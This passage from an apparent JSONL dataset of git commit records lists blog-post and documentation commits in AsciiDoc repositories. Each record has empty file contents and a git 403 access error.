2020-06-24-how-to-use-accounts-ui-with-elm-and-meteor.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-06-24-how-to-use-accounts-ui-with-elm-and-meteor.adoc","new_file":"_posts\/2020-06-24-how-to-use-accounts-ui-with-elm-and-meteor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21914ec154b60c479a5e8673c6bbe73af3b6c564","subject":"Fix STS link in CONTRIBUTING.adoc","message":"Fix STS link in CONTRIBUTING.adoc\n\nCloses gh-5796\n","repos":"dreis2211\/spring-boot,donhuvy\/spring-boot,lucassaldanha\/spring-boot,chrylis\/spring-boot,mbenson\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,michael-simons\/spring-boot,vpavic\/spring-boot,brettwooldridge\/spring-boot,RichardCSantana\/spring-boot,bjornlindstrom\/spring-boot,tsachev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jbovet\/spring-boot,ollie314\/spring-boot,xiaoleiPENG\/my-project,vpavic\/spring-boot,NetoDevel\/spring-boot,candrews\/spring-boot,i007422\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,zhanhb\/spring-boot,habuma\/spring-boot,pvorb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,yhj630520\/spring-boot,wilkinsona\/spring-boot,qerub\/spring-boot,isopov\/spring-boot,mbenson\/spring-boot,minmay\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot-concourse,dreis2211\/spring-boot,Nowheresly\/spring-boot,vakninr\/spring-boot,ollie314\/spring-boot,herau\/spring-boot,joshthornhill\/spring-boot,donhuvy\/spring-boot,michael-simons\/spring-boot,sebastiankirsch\/spring-boot,hello2009chen\/spring-boot,joshiste\/spring-boot,tsachev\/spring-boot,bclozel\/spring-boot,DeezCashews\/spring-boot,thomasdarimont\/spring-boot,jbovet\/spring-boot,NetoDevel\/spring-boot,kdvolder\/spring-boot,Buzzardo\/spring-boot,RichardCSantana\/spring-boot,vpavic\/spring-boot,dreis2211\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,htynkn\/spring-boot,zhanhb\/spring-boot,brettwooldridge\/spring-boot,nebhale\/spring-boot,michael-simons\/spring-boot,jvz\/spring-boot,deki\/spring-boot,wilkinsona\/spring-boot,herau\/spring-boot,bclozel\/spring-boot,xiaoleiPENG\/my-project,chrylis\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,tiarebalbi\/spring-boot,ollie314\/spring-boot,spring-projects\/spring-boot,bbrouwer\/spring-boot,lburgazzoli\/spring-boot,felipeg48\/spring-boot,qerub\/spring-boot,philwebb\/spring-boot-concourse,yangdd1205\/spring-boot,ilayaperumalg\/spring-boot,deki\/spring-boot,hello2009chen\/spring-boot,hqrt\/jenkins2-course-spring-boot,mbogoevici\/spring-boot,habuma\/spring-boot,spring-projects\/spring-boot,bijukunjummen\/spring-boot,pvorb\/spring-boot,javyzheng\/spring-boot,ptahchiev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tsachev\/spring-boot,i007422\/jenkins2-course-spring-boot,lexandro\/spring-boot,spring-projects\/spring-boot,vakninr\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,royclarkson\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,royclarkson\/spring-boot,aahlenst\/spring-boot,thomasdarimont\/spring-boot,mbogoevici\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,SaravananParthasarathy\/SPSDemo,drumonii\/spring-boot,olivergierke\/spring-boot,RichardCSantana\/spring-boot,htynkn\/spring-boot,eddumelendez\/spring-boot,mdeinum\/s
pring-boot,jbovet\/spring-boot,bjornlindstrom\/spring-boot,jvz\/spring-boot,drumonii\/spring-boot,shangyi0102\/spring-boot,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,deki\/spring-boot,SaravananParthasarathy\/SPSDemo,hqrt\/jenkins2-course-spring-boot,shakuzen\/spring-boot,sebastiankirsch\/spring-boot,hqrt\/jenkins2-course-spring-boot,sbcoba\/spring-boot,minmay\/spring-boot,thomasdarimont\/spring-boot,minmay\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,philwebb\/spring-boot-concourse,isopov\/spring-boot,jbovet\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,shangyi0102\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,qerub\/spring-boot,donhuvy\/spring-boot,dreis2211\/spring-boot,wilkinsona\/spring-boot,lucassaldanha\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,bijukunjummen\/spring-boot,bijukunjummen\/spring-boot,ihoneymon\/spring-boot,sebastiankirsch\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,kdvolder\/spring-boot,akmaharshi\/jenkins,eddumelendez\/spring-boot,linead\/spring-boot,ilayaperumalg\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,mdeinum\/spring-boot,scottfrederick\/spring-boot,habuma\/spring-boot,felipeg48\/spring-boot,shakuzen\/spring-boot,Nowheresly\/spring-boot,olivergierke\/spring-boot,deki\/spring-boot,lucassaldanha\/spring-boot,bclozel\/spring-boot,Nowheresly\/spring-boot,aahlenst\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,javyzheng\/spring-boot,joshthornhill\/spring-boot,rweisleder\/spring-boot,bijukunjummen\/spring-boot,DeezCashews\/spring-boot,hello2009chen\/spring-boot,drumonii\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,donhuvy\/spring-boot,mdeinum\/spring-boot,bjornlindstrom\/spring-boot,pvorb\/spring-boot,wilkinsona\/spring-boot,olivergierke\/spring-boot,NetoDevel\/spring-boot,mdeinum\/spring-boot,mosoft521\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,kamilszymanski\/spring-boot,akmaharshi\/jenkins,sbcoba\/spring-boot,vakninr\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,nebhale\/spring-boot,herau\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,lexandro\/spring-boot,kdvolder\/spring-boot,bbrouwer\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,sebastiankirsch\/spring-boot,linead\/spring-boot,akmaharshi\/jenkins,lexandro\/spring-boot,rweisleder\/spring-boot,candrews\/spring-boot,ptahchiev\/spring-boot,i007422\/jenkins2-course-spring-boot,zhanhb\/spring-boot,royclarkson\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,xiaoleiPENG\/my-project,bbrouwer\/spring-boot,bbrouwer\/spring-boot,deki\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,shangyi0102\/spring-boot,joshthornhill\/spring-boot,drumonii\/spring-boot,DeezCashews\/spring-boot,ollie314\/spring-boot,qerub\/spring-boot,mosoft521\/spring-boot,isopov\/spring-boot,lexandro\/spring-boot,vakninr\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,jxblum\/spring-boot,javyzheng\/spring-boot,akmaharshi\/jenkins,drumonii\/spring-boot,philwebb\/spring-boot,DeezCashews\/spring-boot,vpavic\/spring-boot,mbenson\/spring-boot,hello2009chen\/spring-boot,joshthornhill\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,brettwooldridge\/spring-boot,ptahchiev\/sprin
g-boot,linead\/spring-boot,tiarebalbi\/spring-boot,shakuzen\/spring-boot,NetoDevel\/spring-boot,lucassaldanha\/spring-boot,habuma\/spring-boot,nebhale\/spring-boot,chrylis\/spring-boot,bjornlindstrom\/spring-boot,jxblum\/spring-boot,jxblum\/spring-boot,mosoft521\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,mbogoevici\/spring-boot,yangdd1205\/spring-boot,drumonii\/spring-boot,felipeg48\/spring-boot,eddumelendez\/spring-boot,bijukunjummen\/spring-boot,eddumelendez\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,yhj630520\/spring-boot,kamilszymanski\/spring-boot,jayarampradhan\/spring-boot,lburgazzoli\/spring-boot,DeezCashews\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,afroje-reshma\/spring-boot-sample,jbovet\/spring-boot,hello2009chen\/spring-boot,ilayaperumalg\/spring-boot,mosoft521\/spring-boot,qerub\/spring-boot,habuma\/spring-boot,scottfrederick\/spring-boot,sbcoba\/spring-boot,mbogoevici\/spring-boot,brettwooldridge\/spring-boot,ihoneymon\/spring-boot,kdvolder\/spring-boot,bclozel\/spring-boot,brettwooldridge\/spring-boot,kdvolder\/spring-boot,isopov\/spring-boot,candrews\/spring-boot,aahlenst\/spring-boot,shakuzen\/spring-boot,mosoft521\/spring-boot,felipeg48\/spring-boot,sbcoba\/spring-boot,nebhale\/spring-boot,thomasdarimont\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,Buzzardo\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,joshiste\/spring-boot,shangyi0102\/spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,philwebb\/spring-boot,javyzheng\/spring-boot,philwebb\/spring-boot,lexandro\/spring-boot,jayarampradhan\/spring-boot,scottfrederick\/spring-boot,olivergierke\/spring-boot,jvz\/spring-boot,ilayaperumalg\/spring-boot,jxblum\/spring-boot,spring-projects\/spring-boot,olivergierke\/spring-boot,isopov\/spring-boot,bbrouwer\/spring-boot,SaravananParthasarathy\/SPSDemo,felipeg48\/spring-boot,xiaoleiPENG\/my-project,ilayaperumalg\/spring-boot,rweisleder\/spring-boot,lburgazzoli\/spring-boot,nebhale\/spring-boot,jxblum\/spring-boot,sebastiankirsch\/spring-boot,afroje-reshma\/spring-boot-sample,aahlenst\/spring-boot,dreis2211\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,pvorb\/spring-boot,shakuzen\/spring-boot,afroje-reshma\/spring-boot-sample,tsachev\/spring-boot,minmay\/spring-boot,bclozel\/spring-boot,jvz\/spring-boot,sbcoba\/spring-boot,yhj630520\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,candrews\/spring-boot,SaravananParthasarathy\/SPSDemo,yhj630520\/spring-boot,thomasdarimont\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot-concourse,RichardCSantana\/spring-boot,habuma\/spring-boot,linead\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot,afroje-reshma\/spring-boot-sample,afroje-reshma\/spring-boot-sample,ihoneymon\/spring-boot,donhuvy\/spring-boot,jvz\/spring-boot,i007422\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,herau\/spring-boot,tiarebalbi\/spring-boot,jayarampradhan\/spring-boot,joshiste\/spring-boot,akmaharshi\/jenkins,Nowheresly\/spring-boot,xiaoleiPENG\/my-project,kamilszymanski\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,htynkn\/spring-boot,michael-simons\/spring-boot,SaravananParthasarathy\/SPSDemo,joshthornhill\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,yhj630520\/spring-boot,philwebb\/spring-boot-concourse,zhanhb\/spring-boot,zhanhb\/spring-boot,tiarebalbi\/spring-bo
ot,ptahchiev\/spring-boot,eddumelendez\/spring-boot,rweisleder\/spring-boot,hqrt\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,kamilszymanski\/spring-boot,shangyi0102\/spring-boot,bclozel\/spring-boot,spring-projects\/spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,RichardCSantana\/spring-boot,linead\/spring-boot,javyzheng\/spring-boot,Buzzardo\/spring-boot,donhuvy\/spring-boot","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91c6fd3a0a6a3f31c141582b4bdc369690d4d6c2","subject":"Update 2015-07-27-TrainingMenuAugust.adoc","message":"Update 2015-07-27-TrainingMenuAugust.adoc","repos":"diodario\/hubpress.io,diodario\/hubpress.io,diodario\/hubpress.io","old_file":"_posts\/2015-07-27-TrainingMenuAugust.adoc","new_file":"_posts\/2015-07-27-TrainingMenuAugust.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diodario\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b45e7cded5bcd340dbf7d3ba948382860be0fe6","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8d57eb97e50b62bd5fe49b4899a840bd9fa7451","subject":"y2b create post SMS Audio - STREET by 50 Headphones Unboxing","message":"y2b create post SMS Audio - STREET by 50 Headphones Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-23-SMS-Audio--STREET-by-50-Headphones-Unboxing.adoc","new_file":"_posts\/2012-04-23-SMS-Audio--STREET-by-50-Headphones-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2dcbd5a62b053b5f50116a05c23557907b406a75","subject":"Update 2016-03-31-Descuidos-fatales.adoc","message":"Update 2016-03-31-Descuidos-fatales.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0655a86a58f3ca22a18fdb81d96c048587927d28","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 
2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f50d2ff5dbb89e0173947d4b13c53b5b6f9cbc8c","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45f39cbded6b4fcbe266cefa48450971b844aa1b","subject":"Update 2019-05-28-What-the-fuck-man.adoc","message":"Update 2019-05-28-What-the-fuck-man.adoc","repos":"dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io","old_file":"_posts\/2019-05-28-What-the-fuck-man.adoc","new_file":"_posts\/2019-05-28-What-the-fuck-man.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dgrizzla\/dgrizzla.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fa5a6ddfaac366ae146f73a58dd9b8e63398bd3","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Search path\/README.adoc","new_file":"Search path\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4c29926970cb05de4f3efde569c6392ae77bb4e","subject":"Update 2015-02-10-R-K.adoc","message":"Update 2015-02-10-R-K.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-02-10-R-K.adoc","new_file":"_posts\/2015-02-10-R-K.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd01c951c079d1cc18820db83538c5105fb49399","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9c21af02cd370451ea6d6a7a3f9b7cd5f2b7b4c","subject":"Update 2017-12-18-Moving-the-blog-to-Github-pages.adoc","message":"Update 
2017-12-18-Moving-the-blog-to-Github-pages.adoc","repos":"flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io","old_file":"_posts\/2017-12-18-Moving-the-blog-to-Github-pages.adoc","new_file":"_posts\/2017-12-18-Moving-the-blog-to-Github-pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flipswitchingmonkey\/flipswitchingmonkey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f024ee7ac2d78c9e824b1ba50499910a2efb87f0","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"795439e957f76f944042aa0ab0586fe934f0c4a8","subject":"y2b create post The World's Most Dangerous iPhone Case","message":"y2b create post The World's Most Dangerous iPhone Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-28-TheWorldsMostDangerousiPhoneCase.adoc","new_file":"_posts\/2017-12-28-TheWorldsMostDangerousiPhoneCase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33792aee83caea646111c0c835c26c5cc4a5e4e0","subject":"Update 2016-06-03-My-journey-to-face-The-Lambda-expressions-in-Java.adoc","message":"Update 2016-06-03-My-journey-to-face-The-Lambda-expressions-in-Java.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-06-03-My-journey-to-face-The-Lambda-expressions-in-Java.adoc","new_file":"_posts\/2016-06-03-My-journey-to-face-The-Lambda-expressions-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32dfa60dbd5360c561d49c9cd9b458d0bc6a413c","subject":"Update 2016-08-12-Components-hacked-into-Struts2-java-web-framework.adoc","message":"Update 2016-08-12-Components-hacked-into-Struts2-java-web-framework.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-08-12-Components-hacked-into-Struts2-java-web-framework.adoc","new_file":"_posts\/2016-08-12-Components-hacked-into-Struts2-java-web-framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68252b154dac6c5853548ff359e016309a186d08","subject":"Update 2017-01-18-Ambiente-de-Desenvolvimento-Rails-Vagrant-Ansible.adoc","message":"Update 2017-01-18-Ambiente-de-Desenvolvimento-Rails-Vagrant-Ansible.adoc","repos":"emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io","old_file":"_posts\/2017-01-18-Ambiente-de-Desenvolvimento-Rails-Vagrant-Ansible.adoc","new_file":"_posts\/2017-01-18-Ambiente-de-Desenvolvimento-Rails-Vagrant-Ansible.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emilio2hd\/emilio2hd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d12510ed22c8550b1d9e861fd8c0931d6d8c486a","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8e416a0cda3f6b6e398da9138f496c4f67023bf","subject":"Added document about WTP","message":"Added document about WTP\n\nQuick references to WTP \n\nChange-Id: I850e000a73b4e16087940b36fa66b4949c202bce\nSigned-off-by: Patrik Suzzi <b03bc6a6b804fee7604b4037c3296a84d81f84d0@gmail.com>","repos":"psuzzi\/asegno,psuzzi\/asegno,psuzzi\/asegno","old_file":"my.example\/my.example.asciidoc\/docsrc\/eclipse.wtp\/eclispe-wtp.adoc","new_file":"my.example\/my.example.asciidoc\/docsrc\/eclipse.wtp\/eclispe-wtp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psuzzi\/asegno.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6e2cd00a36f79475542817cdd23767a60fdd8fae","subject":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","message":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94f439fd0ca34ca1f4918c53a525d7e0e7fce8b5","subject":"CL - unit testing","message":"CL - unit testing\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2b8f2fd16b9fef5128f8bbd794f5dceb140ae713","subject":"Explicitly use trivial-utf8","message":"Explicitly use 
trivial-utf8\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"7561f5a2175b560b3d37c62f832e73101b6a0579","subject":"CL notes: Extracting basename\/filename","message":"CL notes: Extracting basename\/filename\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"17b78b34972a463cb65358744c87f952f6e188e9","subject":"Add note CL - running external program","message":"Add note CL - running external program\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"7d5d1b390510ab7fedf6ceb6e38bc1ef072334fa","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75ebda49f92c3aaef29869ad48f82d8e5bd7cd17","subject":"Update 2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc","message":"Update 2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc","repos":"mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io","old_file":"_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc","new_file":"_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkhymohamed\/mkhymohamed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f48671302fe2c37d75499f95bbdaad649a9d7031","subject":"CL note: Checking if a directory exists","message":"CL note: Checking if a directory exists\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"60cad8e7b4b9454868fc465db710c4cf1579f582","subject":"Note on symbol-value and symbol-function","message":"Note on symbol-value and 
